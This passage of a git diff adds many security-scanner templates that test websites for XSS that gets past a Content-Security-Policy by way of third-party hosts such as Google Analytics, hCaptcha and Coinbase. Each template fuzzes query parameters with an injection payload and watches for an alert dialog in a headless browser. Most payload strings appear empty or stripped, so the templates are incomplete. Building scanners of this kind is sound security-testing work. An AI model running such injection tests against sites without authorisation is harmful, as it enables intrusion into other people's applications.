'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: google_ajax_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "google_ajax_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..2108c8e9340
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: google-analytics-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Analytics
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google-analytics
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: google_analytics_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "google_analytics_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
new file mode 100644
index 00000000000..afeb3eac91c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/google-apis-csp-xss.yaml
@@ -0,0 +1,56 @@
+id: google-apis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google APIs
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: google_apis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "google_apis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml
new file mode 100644
index 00000000000..afc73573aa4
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/graph-facebook-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: graph-facebook-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Facebook Graph API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,facebook
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: graph_facebook_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "graph_facebook_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
new file mode 100644
index 00000000000..8197cc4c4d5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/grubhub-assets-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: grubhub-assets-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Grubhub Assets
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,grubhub
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: grubhub_assets_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "grubhub_assets_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
new file mode 100644
index 00000000000..ada648006e0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gstatic-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gstatic-angular-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Gstatic Angular JS Bundle
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gstatic_angular_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gstatic_angular_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..063e6aac69c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gstatic-recaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gstatic-recaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Gstatic ReCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,gstatic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gstatic_recaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gstatic_recaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
new file mode 100644
index 00000000000..0a69a663751
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/gum-criteo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: gum-criteo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Criteo Gum
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,criteo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: gum_criteo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "gum_criteo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
new file mode 100644
index 00000000000..397bf5aa222
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/hatenaapis-bookmark-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: hatenaapis-bookmark-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Hatenaapis Bookmark
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,hatenaapis
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: hatenaapis_bookmark_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "hatenaapis_bookmark_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..3e7e3c6cabb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: hcaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via hCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,hcaptcha
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: hcaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "hcaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
new file mode 100644
index 00000000000..73c3eb981b2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: help-afterpay-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Afterpay Help
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,afterpay
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: help_afterpay_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "help_afterpay_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
new file mode 100644
index 00000000000..b5a911fa093
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ib-adnxs-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via AppNexus
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,adnxs
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ib_adnxs_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ib_adnxs_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
new file mode 100644
index 00000000000..5879e3da6c1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: info-cloudflare-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Cloudflare Info
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,cloudflare
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: info_cloudflare_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "info_cloudflare_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
new file mode 100644
index 00000000000..5bc836a2192
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: info-elastic-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Elastic Info
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,elastic
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: info_elastic_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "info_elastic_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
new file mode 100644
index 00000000000..5fedee67ae4
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: inno-blob-core-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Azure Blob Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,azure
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: inno_blob_core_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "inno_blob_core_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
new file mode 100644
index 00000000000..af67727c77e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: investor-coinbase-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Coinbase Investor
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,coinbase
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: investor_coinbase_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "investor_coinbase_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
new file mode 100644
index 00000000000..b0ed307cdd2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ipify-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Ipify API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ipify
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ipify_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ipify_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
new file mode 100644
index 00000000000..5f64443de19
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ipinfo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IPInfo
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ipinfo
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ipinfo_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ipinfo_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
new file mode 100644
index 00000000000..5ddecf3ae24
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: itunes-apple-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via iTunes
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,itunes
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: itunes_apple_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "itunes_apple_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml
new file mode 100644
index 00000000000..06187ab405f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: jd-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via JD API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,jd
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: jd_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "jd_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..cd54da677fe
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: js-hcaptcha-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via JS hCaptcha
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,hcaptcha
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: js_hcaptcha_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "js_hcaptcha_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml
new file mode 100644
index 00000000000..b78798f895c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: js-smb-ovoenergy-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via OVO Energy JS SMB
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ovoenergy
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
![](x)
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: js_smb_ovoenergy_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "js_smb_ovoenergy_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml
new file mode 100644
index 00000000000..6bf53a6f9dd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: kbcprod-service-now-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ServiceNow KBCProd
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,servicenow
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
